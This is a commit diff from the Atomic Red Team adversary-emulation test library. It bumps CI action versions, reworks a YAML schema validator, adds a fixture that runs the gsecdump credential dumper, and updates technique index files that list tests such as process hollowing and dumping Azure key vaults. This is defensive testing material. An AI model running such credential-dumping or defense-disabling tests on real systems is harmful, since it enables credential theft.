fix elevation_required

Bump actions/stale from 9 to 10 (#3178 )
Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com> Co-authored-by: Hare Sudhan <code@0x6c.dev>
2025-10-04 14:15:01 -04:00 · 2025-10-04 14:10:30 -04:00 · 2025-10-04 18:08:25 +00:00 · 2025-10-04 14:07:20 -04:00 · 2025-10-04 18:02:43 +00:00 · 2025-10-04 14:01:27 -04:00
102 changed files with 5245 additions and 2763 deletions
@@ -11,7 +11,7 @@ jobs:
    runs-on: ubuntu-latest
    steps:
      - name: download-artifact
-        uses: actions/github-script@v7
+        uses: actions/github-script@v8
        with:
          script: |
            let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({
@@ -35,7 +35,7 @@ jobs:
        run: unzip labels.zip

      - name: assign-labels-and-reviewers
-        uses: actions/github-script@v7
+        uses: actions/github-script@v8
        with:
          script: |
            let fs = require('fs');
@@ -8,13 +8,13 @@ jobs:
    runs-on: ubuntu-latest
    steps:
      - name: checkout repo
-        uses: actions/checkout@v4
+        uses: actions/checkout@v5
        with:
          token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }}

      - name: Install poetry
        run: pipx install poetry
-      - uses: actions/setup-python@v5
+      - uses: actions/setup-python@v6
        with:
          python-version: "3.11.2"
          cache: "poetry"
@@ -12,11 +12,11 @@ jobs:
    runs-on: macos-latest
    steps:
      - name: checkout repo
-        uses: actions/checkout@v4
+        uses: actions/checkout@v5
      - name: Install poetry
        run: pipx install poetry
      - name: setup python3.11
-        uses: actions/setup-python@v5
+        uses: actions/setup-python@v6
        id: setup-python
        with:
          python-version: "3.12.4"
@@ -7,7 +7,7 @@ jobs:
  stale:
    runs-on: ubuntu-latest
    steps:
-      - uses: actions/stale@v9
+      - uses: actions/stale@v10
        with:
          stale-issue-message: 'This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.'
          stale-pr-message: 'This PR is stale because it has been open 45 days with no activity. Remove stale label or comment or this will be closed in 10 days.'
@@ -10,11 +10,11 @@ jobs:
    runs-on: ubuntu-latest
    steps:
      - name: checkout repo
-        uses: actions/checkout@v4
+        uses: actions/checkout@v5
      - name: Install poetry
        run: pipx install poetry
      - name: setup python3.11
-        uses: actions/setup-python@v5
+        uses: actions/setup-python@v6
        id: setup-python
        with:
          python-version: "3.11.2"
@@ -33,16 +33,16 @@ jobs:
    runs-on: ubuntu-latest
    steps:
      - name: checkout repo
-        uses: actions/checkout@v4
+        uses: actions/checkout@v5
      - name: Install poetry
        run: pipx install poetry
      - name: setup python3.11
-        uses: actions/setup-python@v5
+        uses: actions/setup-python@v6
        id: setup-python
        with:
          python-version: "3.11.2"
          cache: "poetry"
-      - uses: actions/github-script@v7
+      - uses: actions/github-script@v8
        id: get_pr_number
        with:
          script: |
@@ -11,7 +11,7 @@ jobs:
  validate-terraform:
    runs-on: ubuntu-latest
    steps:
-      - uses: actions/checkout@v4
+      - uses: actions/checkout@v5
      - uses: hashicorp/setup-terraform@v3

      - name: Terraform fmt
@@ -2,7 +2,7 @@

 # Atomic Red Team

-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1730-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1744-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)


 Atomic Red Team™ is a library of tests mapped to the
@@ -47,7 +47,7 @@ class GithubAPI:
    }

    maintainers = {
-        "windows": ["clr2of8", "MHaggis"],
+        "windows": ["clr2of8", "MHaggis", "cyberbuff"],
        "linux": ["josehelps", "cyberbuff"],
        "macos": ["josehelps", "cyberbuff"],
        "containers": ["patel-bhavin"],
@@ -155,7 +155,7 @@ class Atomic(BaseModel):
    executor: Union[ManualExecutor, CommandExecutor] = Field(..., discriminator="name")
    dependencies: Optional[List[Dependency]] = []
    input_arguments: Dict[constr(min_length=2, pattern=r"^[\w_-]+$"), Argument] = {}
-    dependency_executor_name: ExecutorType = "manual"
+    dependency_executor_name: Optional[ExecutorType] = None
    auto_generated_guid: Optional[UUID] = None

    @classmethod
@@ -173,11 +173,10 @@ class Atomic(BaseModel):
    @field_validator("dependency_executor_name", mode="before")  # noqa
    @classmethod
    def validate_dep_executor(cls, v, info: ValidationInfo):
-        if v is None:
+        if v is not None and info.data.get("dependencies") == []:
            raise PydanticCustomError(
-                "empty_dependency_executor_name",
-                "'dependency_executor_name' shouldn't be empty. Provide a valid value ['manual','powershell', 'sh', "
-                "'bash', 'command_prompt'] or remove the key from YAML",
+                "invalid_dependency_executor_name",
+                "'dependency_executor_name' is not needed if there are no dependencies. Remove the key from YAML",
                {"loc": ["dependency_executor_name"], "input": None},
            )
        return v
@@ -241,6 +240,25 @@ class Technique(BaseModel):
    display_name: str = Field(..., min_length=5)
    atomic_tests: List[Atomic] = Field(min_length=1)

+    @model_validator(mode="before")
+    @classmethod
+    def validate_dependency_executor_names(cls, data):
+        """Check if dependency_executor_name keys are present with empty/None values in atomic tests"""
+        if isinstance(data, dict) and "atomic_tests" in data:
+            atomic_tests = data.get("atomic_tests", [])
+            for i, test in enumerate(atomic_tests):
+                if isinstance(test, dict) and "dependency_executor_name" in test:
+                    value = test.get("dependency_executor_name")
+                    # If the key exists but value is None or empty string, that's an error
+                    if value is None or value == "":
+                        raise PydanticCustomError(
+                            "empty_dependency_executor_name",
+                            "'dependency_executor_name' shouldn't be empty. Provide a valid value ['manual','powershell', 'sh', "
+                            "'bash', 'command_prompt'] or remove the key from YAML",
+                            {"loc": ["atomic_tests", i, "dependency_executor_name"], "input": value},
+                        )
+        return data
+
    def model_post_init(self, __context) -> None:
        for index in range(len(self.atomic_tests)):
            test_number = f"{self.attack_technique}-{index + 1}"
@@ -0,0 +1,20 @@
+attack_technique: T1003
+display_name: OS Credential Dumping
+atomic_tests:
+- name: Gsecdump
+  auto_generated_guid:
+  description: |
+    Dump credentials from memory using Gsecdump.
+  supported_platforms:
+  - windows
+  input_arguments:
+    gsecdump_exe:
+      description: Path to the Gsecdump executable
+      type: path
+      default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
+  executor:
+    command: |
+      "#{gsecdump_exe}" -a
+    name: command_prompt
+    elevation_required: true
+  dependency_executor_name: "bash"
@@ -28,7 +28,6 @@ atomic_tests:
      description: Path to the Gsecdump executable
      type: path
      default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
-  dependency_executor_name: powershell
  executor:
    command: |
      "#{gsecdump_exe}" -a
@@ -92,6 +92,7 @@ def atomic_command_executor_builder():
            executor=CommandExecutor(
                name=executor_name,
                command=f"{formatted_args} Custom steps here...",
+                elevation_required="sudo" in formatted_args,
            ),
            input_arguments=input_arguments,
            **kwargs,
@@ -1 +1 @@
-{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":2,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n- Azure - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- Azure - Dump Azure Storage Account Objects via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1550","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.001","score":2,"enabled":true,"comment":"\n- Azure - Functions code upload - Functions code injection via Blob upload\n- Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.001/T1550.001.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- Azure - Create Snapshot from Managed Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
+{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":2,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n- Azure - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":2,"enabled":true,"comment":"\n- Azure - Functions code upload - Functions code injection via Blob upload\n- Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Storage Account Objects via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1555","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.006","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.006/T1555.006.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- Azure - Create Snapshot from Managed Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1619","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- Azure - Enumerate Azure Blobs with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
@@ -11,20 +11,22 @@ defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,10,GCP - Delete Ac
 defense-evasion,T1578.001,Modify Cloud Compute Infrastructure: Create Snapshot,1,AWS - Create Snapshot from EBS Volume,a3c09662-85bb-4ea8-b15b-6dc8a844e236,sh
 defense-evasion,T1578.001,Modify Cloud Compute Infrastructure: Create Snapshot,2,Azure - Create Snapshot from Managed Disk,89e69b4b-3458-4ec6-b819-b3008debc1bc,sh
 defense-evasion,T1578.001,Modify Cloud Compute Infrastructure: Create Snapshot,3,GCP - Create Snapshot from Persistent Disk,e6fbc036-91e7-4ad3-b9cb-f7210f40dd5d,sh
-defense-evasion,T1550.001,Use Alternate Authentication Material: Application Access Token,1,Azure - Functions code upload - Functions code injection via Blob upload,9a5352e4-56e5-45c2-9b3f-41a46d3b3a43,powershell
-defense-evasion,T1550.001,Use Alternate Authentication Material: Application Access Token,2,Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token,67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1,powershell
 defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
 defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
 credential-access,T1552.005,Unsecured Credentials: Cloud Instance Metadata API,2,Azure - Dump Azure Instance Metadata from Virtual Machines,cc99e772-4e18-4f1f-b422-c5cdd1bfd7b7,powershell
 credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data using stratus,a21118de-b11e-4ebd-b655-42f11142df0c,sh
 credential-access,T1110.003,Brute Force: Password Spraying,9,AWS - Password Spray an AWS using GoAWSConsoleSpray,9c10d16b-20b1-403a-8e67-50ef7117ed4e,sh
-credential-access,T1528,Steal Application Access Token,1,Azure - Dump All Azure Key Vaults with Microburst,1b83cddb-eaa7-45aa-98a5-85fb0a8807ea,powershell
+credential-access,T1528,Steal Application Access Token,1,Azure - Functions code upload - Functions code injection via Blob upload,9a5352e4-56e5-45c2-9b3f-41a46d3b3a43,powershell
+credential-access,T1528,Steal Application Access Token,2,Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token,67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1,powershell
+credential-access,T1555.006,Credentials from Password Stores: Cloud Secrets Management Stores,1,Azure - Dump All Azure Key Vaults with Microburst,1b83cddb-eaa7-45aa-98a5-85fb0a8807ea,powershell
 impact,T1485,Data Destruction,4,GCP - Delete Bucket,4ac71389-40f4-448a-b73f-754346b3f928,sh
 discovery,T1580,Cloud Infrastructure Discovery,1,AWS - EC2 Enumeration from Cloud Instance,99ee161b-dcb1-4276-8ecb-7cfdcb207820,sh
 discovery,T1580,Cloud Infrastructure Discovery,2,AWS - EC2 Security Group Enumeration,99b38f24-5acc-4aa3-85e5-b7f97a5d37ac,command_prompt
 discovery,T1619,Cloud Storage Object Discovery,1,AWS S3 Enumeration,3c7094f8-71ec-4917-aeb8-a633d7ec4ef5,sh
 discovery,T1619,Cloud Storage Object Discovery,2,Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI,070322a4-2c60-4c50-8ffb-c450a34fe7bf,powershell
+discovery,T1619,Cloud Storage Object Discovery,3,Azure - Scan for Anonymous Access to Azure Storage (Powershell),146af1f1-b74e-4aa7-9895-505eb559b4b0,powershell
+discovery,T1619,Cloud Storage Object Discovery,4,Azure - Enumerate Azure Blobs with MicroBurst,3dab4bcc-667f-4459-aea7-4162dd2d6590,powershell
 discovery,T1201,Password Policy Discovery,12,Examine AWS Password Policy,15330820-d405-450b-bd08-16b5be5be9f4,sh
 discovery,T1526,Cloud Service Discovery,1,Azure - Dump Subscription Data with MicroBurst,1e40bb1d-195e-401e-a86b-c192f55e005c,powershell
 discovery,T1526,Cloud Service Discovery,2,AWS - Enumerate common cloud services,aa8b9bcc-46fa-4a59-9237-73c7b93a980c,powershell
@@ -46,14 +48,10 @@ privilege-escalation,T1098,Account Manipulation,17,GCP - Delete Service Account
 privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
 privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
-collection,T1530,Data from Cloud Storage Object,1,Azure - Enumerate Azure Blobs with MicroBurst,3dab4bcc-667f-4459-aea7-4162dd2d6590,powershell
-collection,T1530,Data from Cloud Storage Object,2,Azure - Scan for Anonymous Access to Azure Storage (Powershell),146af1f1-b74e-4aa7-9895-505eb559b4b0,powershell
-collection,T1530,Data from Cloud Storage Object,3,AWS - Scan for Anonymous Access to S3,979356b9-b588-4e49-bba4-c35517c484f5,sh
-collection,T1530,Data from Cloud Storage Object,4,Azure - Dump Azure Storage Account Objects via Azure CLI,67374845-b4c8-4204-adcc-9b217b65d4f1,powershell
+collection,T1530,Data from Cloud Storage Object,1,AWS - Scan for Anonymous Access to S3,979356b9-b588-4e49-bba4-c35517c484f5,sh
+collection,T1530,Data from Cloud Storage Object,2,Azure - Dump Azure Storage Account Objects via Azure CLI,67374845-b4c8-4204-adcc-9b217b65d4f1,powershell
 initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
 initial-access,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 initial-access,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
-lateral-movement,T1550.001,Use Alternate Authentication Material: Application Access Token,1,Azure - Functions code upload - Functions code injection via Blob upload,9a5352e4-56e5-45c2-9b3f-41a46d3b3a43,powershell
-lateral-movement,T1550.001,Use Alternate Authentication Material: Application Access Token,2,Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token,67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1,powershell
 execution,T1651,Cloud Administration Command,1,AWS Run Command (and Control),a3cc9c95-c160-4b86-af6f-84fba87bfd30,powershell
 execution,T1648,Serverless Execution,1,Lambda Function Hijack,87a4a141-c2bb-49d1-a604-8679082d8b91,powershell
@@ -36,6 +36,8 @@ defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD,
 defense-evasion,T1216.001,Signed Script Proxy Execution: Pubprn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
 defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
 defense-evasion,T1564.008,Hide Artifacts: Email Hiding Rules,1,New-Inbox Rule to Hide E-mail in M365,30f7d3d1-78e2-4bf0-9efa-a175b5fce2a9,powershell
+defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,1,Decode Eicar File and Write to File,7693ccaa-8d64-4043-92a5-a2eb70359535,powershell
+defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,2,Decrypt Eicar File and Write to File,b404caaa-12ce-43c7-9214-62a531c044f7,powershell
 defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
 defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
 defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
@@ -77,8 +79,9 @@ defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Cachi
 defense-evasion,T1542.001,Pre-OS Boot: System Firmware,1,UEFI Persistence via Wpbbin.exe File Creation,b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1,powershell
 defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
-defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
+defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
 defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,2,Masquerade as a built-in system executable,35eb8d16-9820-4423-a2a1-90c4f5edd9ca,powershell
+defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,3,Masquerading cmd.exe as VEDetector.exe,03ae82a6-9fa0-465b-91df-124d8ca5c4e8,powershell
 defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
 defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
 defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
@@ -177,6 +180,7 @@ defense-evasion,T1140,Deobfuscate/Decode Files or Information,7,FreeBSD b64encod
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,8,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,9,Linux Base64 Encoded Shebang in CLI,3a15c372-67c1-4430-ac8e-ec06d641ce4d,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,10,XOR decoding and command execution using Python,c3b65cd5-ee51-4e98-b6a3-6cbdec138efc,bash
+defense-evasion,T1140,Deobfuscate/Decode Files or Information,11,Expand CAB with expand.exe,9f8b1c54-cb76-4d5e-bb1f-2f5c0e8f5a11,command_prompt
 defense-evasion,T1562,Impair Defenses,1,Windows Disable LSA Protection,40075d5f-3a70-4c66-9125-f72bee87247d,command_prompt
 defense-evasion,T1562,Impair Defenses,2,Disable journal logging via systemctl utility,c3a377f9-1203-4454-aa35-9d391d34768f,sh
 defense-evasion,T1562,Impair Defenses,3,Disable journal logging via sed utility,12e5551c-8d5c-408e-b3e4-63f53b03379f,sh
@@ -535,6 +539,8 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,54,Disable Ev
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,55,Disable EventLog-Application Auto Logger Session Via Registry - PowerShell,da86f239-9bd3-4e85-92ed-4a94ef111a1c,powershell
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,56,Disable EventLog-Application ETW Provider Via Registry - Cmd,1cac9b54-810e-495c-8aac-989e0076583b,command_prompt
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,57,Disable EventLog-Application ETW Provider Via Registry - PowerShell,8f907648-1ebf-4276-b0f0-e2678ca474f0,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,58,Freeze PPL-protected process with EDR-Freeze,cbb2573a-a6ad-4c87-aef8-6e175598559b,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,59,Disable ASLR Via sysctl parameters - Linux,ac333fe1-ce2b-400b-a117-538634427439,bash
 defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,3,Process Hollowing in Go using CreateProcessW WinAPI,c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a,powershell
@@ -642,8 +648,6 @@ defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,10,Create
 defense-evasion,T1578.001,Modify Cloud Compute Infrastructure: Create Snapshot,1,AWS - Create Snapshot from EBS Volume,a3c09662-85bb-4ea8-b15b-6dc8a844e236,sh
 defense-evasion,T1578.001,Modify Cloud Compute Infrastructure: Create Snapshot,2,Azure - Create Snapshot from Managed Disk,89e69b4b-3458-4ec6-b819-b3008debc1bc,sh
 defense-evasion,T1578.001,Modify Cloud Compute Infrastructure: Create Snapshot,3,GCP - Create Snapshot from Persistent Disk,e6fbc036-91e7-4ad3-b9cb-f7210f40dd5d,sh
-defense-evasion,T1550.001,Use Alternate Authentication Material: Application Access Token,1,Azure - Functions code upload - Functions code injection via Blob upload,9a5352e4-56e5-45c2-9b3f-41a46d3b3a43,powershell
-defense-evasion,T1550.001,Use Alternate Authentication Material: Application Access Token,2,Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token,67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1,powershell
 defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
 defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
@@ -822,6 +826,8 @@ privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,6,Replace utilman.exe (Ease of Access Binary) with cmd.exe,1db380da-3422-481d-a3c8-6d5770dba580,command_prompt
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,7,Replace Magnify.exe (Magnifier binary) with cmd.exe,5e4fa70d-c789-470e-85e1-6992b92bb321,command_prompt
